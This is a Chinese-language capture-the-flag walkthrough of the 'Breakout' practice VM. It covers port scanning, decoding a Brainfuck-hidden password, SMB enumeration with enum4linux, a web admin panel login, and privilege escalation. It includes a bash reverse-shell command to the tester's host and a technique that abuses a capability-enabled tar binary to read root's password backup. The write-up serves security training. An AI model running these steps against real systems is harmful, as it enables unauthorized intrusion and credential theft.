Difficulty: Easy

This box was created to be an Easy box, but it can be Medium if you get lost.

For hints discord Server ( https://discord.gg/7asvAhCEhe )

信息收集

靶机开机显示ip

image-20221011084538204

nmap

image-20221011084614929

1
2
kali  192.168.169.220
靶机   192.168.169.230

靶机ip扫描

image-20221011085324487

端口访问 80、139、445、10000、20000端口

  • 139、445 无法访问

  • 80

    image-20221011090922820

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    # 查看源代码


    <!--
    don't worry no one will get here, it's safe to share with you my access. Its encrypted :)

    ++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.


    -->


    Brainfuck是一种极小化的计算机语言,它是由Urban Müller在1993年创建的。由于fuck在英语中是脏话,这种语言有时被称为brainf*ck或brainf**k,甚至被简称为BF。
    这就是一个语言,但它不像C++那么多元化,但难度也一定的增加,因为
    它只有8种关键字!
    1
    2
    3
    # brainfuck解码

    .2uqPEfj3D<P'a-3

  • 10000

image-20221011092404574

  • 20000

image-20221011092429845

enum4linux

  • enum4linux是Kali Linux自带的一款信息收集工具。它可以收集Windows系统的大量信息,如用户名列表、主机列表、共享列表、密码策略信息、工作组和成员信息、主机信息、打印机信息等等。该工具主要是针对Windows NT/2000/XP/2003,在Windows 7/10系统,部分功能受限。总的来说,一个工具可以获取这么多的信息,也算非常强大了。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
-U
	获取用户列表

-M
	get machine list*

-S
	获取共享列表

-P
	获取密码策略信息

-G
	获取组和成员列表

-d
	详细说明,适用于-U和-S

-u user
	指定要使用的用户名(默认为“”)

-p pass
	指定要使用的密码(默认为“”)
-a
	执行所有简单的枚举(-U -S -G -P -r -o -n -i)。如果您未提供其他任何选项,则启用此选项。

-h
	显示帮助信息并退出

-r
	通过RID循环枚举用户

-R range
	要枚举的范围(默认值:500-550、1000-1050,暗含-r)

-K n
	继续搜索RID,直到n个连续的RID与用户名不对应为止。 Impies RID范围以999999结尾。对于DC很有用。

-l
	通过LDAP 389 / TCP获取一些(有限的)信息(仅适用于DC
1
enum4linux -a 192.168.169.230

image-20221011095615353

登录

1
https://192.168.169.230:20000/
1
2
u: cyber
p: .2uqPEfj3D<P'a-3

image-20221011095832831

shell

image-20221011100354685

  • 可以直接写shell

image-20221011100539109

1
3mp!r3{You_Manage_To_Break_To_My_Secure_Access}

  • 全看tar权限,可以读取任意文件

1
2
[cyber@breakout ~]$ ls -hl tar
[cyber@breakout ~]$ getcap tar

image-20221011101013805

  • 使用tar压缩和解压缩,成功获得root 权限的flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
cyber@breakout ~]$ ./tar -cvf ailx10.tar /var/backups/.old_pass.bak
./tar: Removing leading `/' from member names
/var/backups/.old_pass.bak

[cyber@breakout ~]$ ./tar -xvf ailx10.tar
var/backups/.old_pass.bak
[cyber@breakout ~]$ ls

ailx10.tar
tar
user.txt
var


[cyber@breakout ~]$ cat ./var/backups/.old_pass.bak
Ts&4&YurgtRX(=~h

image-20221011101118938

  • 开启监听。开始执行shell。
1
bash -i >& /dev/tcp/192.168.169.220/6666 0>&1

image-20221011101436164

  • 切换用户
1
Ts&4&YurgtRX(=~h

image-20221011101900002

  • 结束